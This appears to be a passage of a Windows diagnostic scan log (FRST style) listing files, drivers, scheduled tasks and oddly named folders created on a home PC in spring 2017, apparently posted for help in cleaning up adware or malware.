2017-05-11 14:18 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-11 14:18 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-11 14:18 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-11 14:18 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-11 14:18 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-11 14:18 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-11 14:18 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-11 14:18 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-11 14:18 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-11 14:03 - 2017-05-11 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\NPASRE
2017-05-10 16:11 - 2017-05-10 16:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\My Games
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-4d03-1
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-1147-0
2017-05-09 13:11 - 2017-05-09 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\VNASRE
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{636564e6-512c-0}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{55b52545-312c-1}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{055b525f-612c-0}
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3db3-1
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2227-0
2017-05-08 16:50 - 2017-05-08 16:50 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\ANSARE
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-6423-0
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-13c7-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6415-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3141-0
2017-05-07 15:12 - 2017-05-25 16:04 - 00000000 ____D C:\ProgramData\Orbit
2017-05-07 15:12 - 2017-05-07 15:12 - 00281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-05-07 15:12 - 2017-05-07 15:12 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\PunkBuster
2017-05-07 15:06 - 2017-05-25 16:04 - 00000000 ____D C:\Users\Nick Schuster\Documents\My Games
2017-05-07 14:58 - 2017-05-11 23:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Ubisoft Game Launcher
2017-05-07 14:51 - 2017-05-07 14:51 - 00000000 ____D C:\Windows\System32\Tasks\Games
2017-05-07 14:41 - 2017-05-07 14:41 - 00282512 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-05-07 14:41 - 2017-05-07 14:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 14:38 - 2017-05-07 14:38 - 00394296 _____ (Duplex Secure Ltd.) C:\Windows\system32\Drivers\sptd.sys
2017-05-07 14:03 - 2017-05-07 14:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Disc_Soft_Ltd
2017-05-07 13:50 - 2017-05-07 13:50 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-07 13:14 - 2017-05-07 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Lite
2017-05-07 13:14 - 2017-05-07 13:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-07 13:14 - 2017-05-07 13:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-07 13:13 - 2017-05-07 13:13 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ba3-1
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-0291-0
2017-05-05 18:00 - 2017-05-05 18:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinRAR
2017-05-05 14:10 - 2017-05-31 13:47 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\background_fault
2017-05-05 14:10 - 2017-05-05 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\WANARE
2017-05-05 14:10 - 2017-05-05 14:10 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 00:06 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-5a03-0
2017-05-04 00:05 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-1c67-1
2017-05-03 22:04 - 2017-05-03 22:04 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2017-05-03 20:46 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{E291433F-553A-F494-7993-5DB4F74EF600}
2017-05-03 20:46 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1F88CA98-A823-7D33-19C2-25D7F85A3115}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{30a66e80-412c-0}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{0f4d7d53-512c-0}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{00d223fb-612c-1}
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\redsn0w
2017-05-03 17:35 - 2017-05-04 00:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Apple Computer
2017-05-03 17:35 - 2017-05-04 00:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Apple Computer
2017-05-03 17:34 - 2017-05-03 17:34 - 00000000 ____D C:\ProgramData\Apple Computer
2017-05-03 17:06 - 2017-05-07 12:24 - 00000000 _____ C:\Windows\SysWOW64\4
2017-05-03 15:17 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-03 15:17 - 2017-05-03 21:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNAREA
2017-04-28 16:50 - 2017-04-28 17:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\SecondLife
2017-04-27 15:29 - 2017-04-27 15:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Everness
2017-04-27 15:28 - 2017-04-27 15:28 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-26 17:00 - 2017-05-05 17:00 - 00000000 ____D C:\Insist
2017-04-25 13:12 - 2017-05-05 16:02 - 00000000 ____D C:\Windows\psgo
2017-04-23 14:16 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\wmitomi.dll
2017-04-23 14:16 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2017-04-23 14:16 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2017-04-23 14:16 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmitomi.dll
2017-04-23 14:16 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2017-04-23 14:16 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2017-04-23 14:16 - 2017-03-11 01:38 - 00275800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2017-04-23 14:16 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\wisp.dll
2017-04-23 14:16 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wisp.dll
2017-04-23 14:16 - 2017-03-08 04:44 - 00448285 _____ C:\Windows\system32\ApnDatabase.xml
2017-04-23 12:05 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\f9d60eee-41d1-1
2017-04-23 12:05 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\f9d60eee-04d5-0
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-6bc1-0
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4b23-1
2017-04-20 18:05 - 2017-04-20 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-5761-1
2017-04-20 18:05 - 2017-04-20 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ce5-0
2017-04-20 12:31 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 12:31 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-19 18:05 - 2017-04-19 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-58d7-1
2017-04-19 18:05 - 2017-04-19 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-0091-0
2017-04-19 14:08 - 2017-05-07 13:38 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\3DM
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{79ad3ae3-412c-1}
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{74b842e5-112c-0}
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{4bea5929-412c-0}
2017-04-18 17:00 - 2017-04-18 17:00 - 00004000 _____ C:\Windows\System32\Tasks\Samsung Update
2017-04-17 12:52 - 2017-04-17 12:52 - 00000000 ____D C:\Windows\Update
2017-04-14 12:05 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\f9d60eee-6097-0
2017-04-14 12:00 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{341DC82C-83B6-7F87-DEF3-C97D7103A5DF}
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\f9d60eee-5791-0
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\{698332d3-212c-0}
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\{26445420-112c-1}
2017-04-14 12:00 - 2017-04-14 12:00 - 00003744 _____ C:\Windows\System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462}
2017-04-14 12:00 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\575f1242
2017-04-13 12:11 - 2017-05-25 12:06 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNARE
2017-04-12 11:01 - 2017-04-29 00:44 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-12 11:01 - 2017-04-29 00:44 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-12 10:52 - 2017-03-14 16:26 - 03714560 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-12 10:51 - 2017-03-14 21:06 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-12 10:51 - 2017-03-14 16:09 - 02240512 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-12 10:51 - 2017-03-14 16:08 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-12 10:51 - 2017-03-14 16:06 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-04-12 10:51 - 2017-03-13 18:13 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-12 10:51 - 2017-03-13 18:12 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-12 10:51 - 2017-03-13 18:08 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2017-04-12 10:51 - 2017-03-13 18:08 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-12 10:51 - 2017-03-13 17:59 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-04-12 10:51 - 2017-03-13 17:59 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-04-12 10:51 - 2017-03-13 17:56 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-04-12 10:51 - 2017-03-12 17:04 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BasicRender.sys
2017-04-12 10:51 - 2017-03-11 05:59 - 01763888 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2017-04-12 10:51 - 2017-03-11 05:56 - 01489608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2017-04-12 10:51 - 2017-03-11 05:44 - 00373080 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-04-12 10:51 - 2017-03-11 05:41 - 00315224 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2017-04-12 10:51 - 2017-03-09 23:08 - 00044032 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-04-12 10:51 - 2017-03-09 21:29 - 00035840 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2017-04-12 10:51 - 2017-03-04 21:24 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2017-04-12 10:51 - 2017-03-04 21:06 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2017-04-12 10:51 - 2017-03-04 20:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2017-04-12 10:51 - 2017-03-04 18:37 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2017-04-12 10:51 - 2017-03-03 17:11 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-04-12 10:51 - 2017-03-03 17:10 - 00138752 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
2017-04-12 10:51 - 2017-03-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-04-12 10:51 - 2017-03-03 17:04 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmjpegdec.dll
2017-04-12 10:51 - 2017-02-11 20:18 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2017-04-12 10:51 - 2017-02-11 19:00 - 00865792 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-12 10:51 - 2017-02-11 18:49 - 00269824 _____ (Microsoft Corporation) C:\Windows\system32\DafPrintProvider.dll
2017-04-12 10:51 - 2017-02-11 18:42 - 00204288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DafPrintProvider.dll
2017-04-12 10:51 - 2017-02-10 21:06 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-04-12 10:51 - 2017-02-10 16:37 - 00046600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys
2017-04-12 10:51 - 2017-02-04 19:53 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-12 10:51 - 2017-02-04 19:51 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-12 10:51 - 2017-02-04 19:19 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-04-12 10:51 - 2017-02-01 21:44 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-04-12 10:51 - 2017-02-01 21:42 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-04-12 10:51 - 2017-01-19 04:18 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2017-04-12 10:51 - 2017-01-18 16:35 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-12 10:51 - 2017-01-18 16:34 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-04-12 10:51 - 2017-01-14 22:32 - 00955016 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2017-04-12 10:51 - 2017-01-14 21:18 - 00787688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2017-04-12 10:51 - 2017-01-12 18:51 - 00274776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys
2017-04-12 10:51 - 2017-01-12 18:51 - 00117592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdNisDrv.sys
2017-04-12 10:51 - 2017-01-12 08:12 - 00990040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2017-04-12 10:51 - 2017-01-11 21:12 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll
2017-04-12 10:51 - 2017-01-11 19:28 - 00422744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2017-04-12 10:51 - 2017-01-11 17:09 - 00296960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SessEnv.dll
2017-04-12 10:51 - 2017-01-11 00:37 - 00138752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2017-04-12 10:51 - 2017-01-10 23:06 - 00840192 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2017-04-12 10:51 - 2017-01-10 22:46 - 01388544 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2017-04-12 10:51 - 2017-01-10 21:20 - 00696832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2017-04-12 10:51 - 2017-01-10 21:09 - 01108480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2017-04-12 10:51 - 2017-01-06 19:25 - 02513408 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2017-04-12 10:51 - 2017-01-06 19:04 - 01495552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2017-04-12 10:51 - 2016-12-25 03:21 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scfilter.sys
2017-04-12 10:51 - 2016-12-25 03:14 - 00242176 _____ (Microsoft Corporation) C:\Windows\system32\WinSCard.dll
2017-04-12 10:51 - 2016-12-25 02:48 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\certprop.dll
2017-04-12 10:51 - 2016-12-25 02:19 - 00170496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSCard.dll
2017-04-12 10:51 - 2016-12-25 01:39 - 00133120 _____ (Microsoft Corporation) C:\Windows\system32\ScDeviceEnum.dll
2017-04-12 10:51 - 2016-12-09 10:08 - 00379736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2017-04-10 13:59 - 2017-05-07 13:44 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AMD
2017-04-10 13:59 - 2017-04-10 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNARER
2017-04-06 23:28 - 2017-05-07 13:34 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\clean
2017-04-04 00:34 - 2017-04-04 01:35 - 00003336 _____ C:\Windows\System32\Tasks\Update
2017-03-30 21:00 - 2017-05-05 17:00 - 00003520 _____ C:\Windows\System32\Tasks\Windows-PG
2017-03-30 21:00 - 2017-03-30 21:00 - 00000000 ____D C:\Update
2017-03-29 10:46 - 2017-03-29 10:46 - 00000000 ____D C:\Program Files (x86)\temp
2017-03-28 19:41 - 2017-03-28 19:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Firefox
2017-03-28 19:39 - 2017-03-28 19:39 - 00000000 ____D C:\Windows\system32\log
2017-03-28 19:39 - 2017-03-28 19:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Firefox
2017-03-28 19:39 - 2017-03-28 19:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Yeshat
2017-03-28 19:39 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participa珲es Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-03-28 19:39 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participa珲es Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-03-28 19:38 - 2017-04-01 11:33 - 00000000 _____ C:\Windows\SysWOW64\3
2017-03-27 14:45 - 2017-03-27 14:45 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\clean
2017-03-22 23:56 - 2017-03-22 23:56 - 00000000 ____D C:\Users\Public\Documents\Steam
2017-03-22 23:46 - 2017-03-29 10:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Modern Warfare Remastered
2017-03-19 16:46 - 2017-03-19 16:46 - 00000000 ____D C:\Users\Nick Schuster\Documents\Audacity
2017-03-19 16:30 - 2017-03-19 16:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\audacity
2017-03-19 15:51 - 2017-04-04 11:44 - 00000000 ____D C:\Users\Nick Schuster\Desktop\Viedeo
2017-03-19 15:48 - 2017-03-19 15:48 - 00000000 ____D C:\Users\Nick Schuster\Desktop\allgemein
2017-03-19 14:02 - 2017-03-19 16:15 - 00001283 _____ C:\Users\Nick Schuster\Desktop\Adobe After Effects CC 2015.lnk
2017-03-19 13:49 - 2017-03-19 13:49 - 00000000 ____D C:\Users\Public\Documents\AdobeInstalledCodecs
2017-03-19 13:44 - 2017-03-19 13:44 - 00001251 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk
2017-03-19 13:42 - 2017-03-19 13:42 - 00001357 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk
2017-03-19 13:40 - 2017-03-19 13:49 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-03-19 13:38 - 2017-03-21 15:01 - 00001567 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk
2017-03-19 11:39 - 2017-03-19 11:39 - 00003518 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de
2017-03-19 11:38 - 2017-03-21 21:32 - 00000000 ____D C:\Users\Nick Schuster\Documents\Adobe
2017-03-19 11:25 - 2017-03-19 11:55 - 00000000 ___RD C:\Users\Nick Schuster\Creative Cloud Files
2017-03-19 11:25 - 2017-03-19 11:25 - 00000000 ____D C:\ProgramData\boost_interprocess
2017-03-18 23:48 - 2017-03-18 23:48 - 00000000 ____D C:\Users\Nick Schuster\Documents\CPY_SAVES
2017-03-18 15:14 - 2017-03-18 15:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\MegaDownloader
2017-03-18 15:14 - 2017-03-18 15:14 - 00000000 ____D C:\Program Files\MegaDownloader
2017-03-18 14:21 - 2017-03-18 14:21 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2017-03-18 14:20 - 2017-03-18 14:20 - 00000000 ____D C:\Program Files\Steinberg
2017-03-18 14:20 - 2017-03-18 14:20 - 00000000 ____D C:\Program Files (x86)\Steinberg
2017-03-18 14:19 - 2015-03-11 12:47 - 01554944 _____ (HMS hxxp://hp.vector.co.jp/authors/VA012897/) C:\Windows\SysWOW64\vorbis.acm
2017-03-18 14:19 - 2015-03-11 12:47 - 01470976 _____ (HMS hxxp://hp.vector.co.jp/authors/VA012897/) C:\Windows\system32\vorbis.acm
2017-03-18 14:14 - 2015-09-04 13:44 - 666655339 _____ (Image-Line ) C:\Users\Nick Schuster\Documents\fl studio 12 crack setup.exe
2017-03-17 15:51 - 2017-03-17 15:54 - 00000000 ___RD C:\Users\Nick Schuster\Documents\MEGA
2017-03-17 15:51 - 2017-03-17 15:51 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Mega Limited
2017-03-17 14:02 - 2017-05-31 10:46 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-17 13:45 - 2017-04-28 19:17 - 00003542 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-03-17 13:45 - 2017-04-28 19:17 - 00003414 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-03-17 12:39 - 2017-03-17 12:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\BrowserModule
2017-03-17 12:37 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\5aceedc5-7cf5-1
2017-03-17 12:37 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\5aceedc5-3161-0
2017-03-17 12:30 - 2017-03-17 12:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.1.2
2017-03-17 12:20 - 2017-06-01 12:00 - 00003614 _____ C:\Windows\System32\Tasks\Milimili
2017-03-17 12:20 - 2017-05-07 13:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Kyubey
2017-03-17 12:20 - 2017-03-17 14:16 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-17 12:19 - 2017-06-01 12:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc
2017-03-17 12:19 - 2017-03-21 15:08 - 00000000 ____D C:\Program Files (x86)\BikaQRss
2017-03-17 00:03 - 2017-03-17 00:04 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Mikghbiritain
2017-03-17 00:03 - 2017-03-17 00:03 - 00006020 _____ C:\Windows\System32\Tasks\Qizsywosale Core
2017-03-17 00:03 - 2017-03-17 00:03 - 00003992 _____ C:\Windows\System32\Tasks\Perkeentgreserk
2017-03-17 00:03 - 2017-03-17 00:03 - 00000000 ____D C:\Program Files (x86)\Qizsywosale Core
2017-03-16 23:29 - 2017-05-14 22:50 - 00000000 ____D C:\Users\Nick Schuster\Desktop\fl studio songs
2017-03-16 13:19 - 2017-05-31 16:11 - 00001312 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-15 19:52 - 2017-02-04 22:30 - 01663184 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:52 - 2017-02-04 22:30 - 01523216 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2017-03-15 19:52 - 2017-02-04 22:30 - 01490128 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:52 - 2017-02-04 22:30 - 01358960 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2017-03-15 19:52 - 2017-01-05 20:09 - 07076864 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2017-03-15 19:52 - 2017-01-05 19:13 - 07796224 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2017-03-15 19:51 - 2017-02-09 17:28 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:51 - 2017-02-09 17:19 - 01377792 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:51 - 2017-02-09 17:16 - 01560064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:51 - 2017-02-09 16:59 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2017-03-15 19:51 - 2017-02-09 16:58 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2017-03-15 19:51 - 2017-02-09 16:58 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2017-03-15 19:51 - 2017-02-04 21:32 - 00251392 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2017-03-15 19:51 - 2017-02-04 21:30 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:51 - 2017-02-04 20:14 - 01001472 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:51 - 2017-02-04 19:50 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:51 - 2017-02-04 19:40 - 01754112 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2017-03-15 19:51 - 2017-02-04 19:32 - 00584704 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
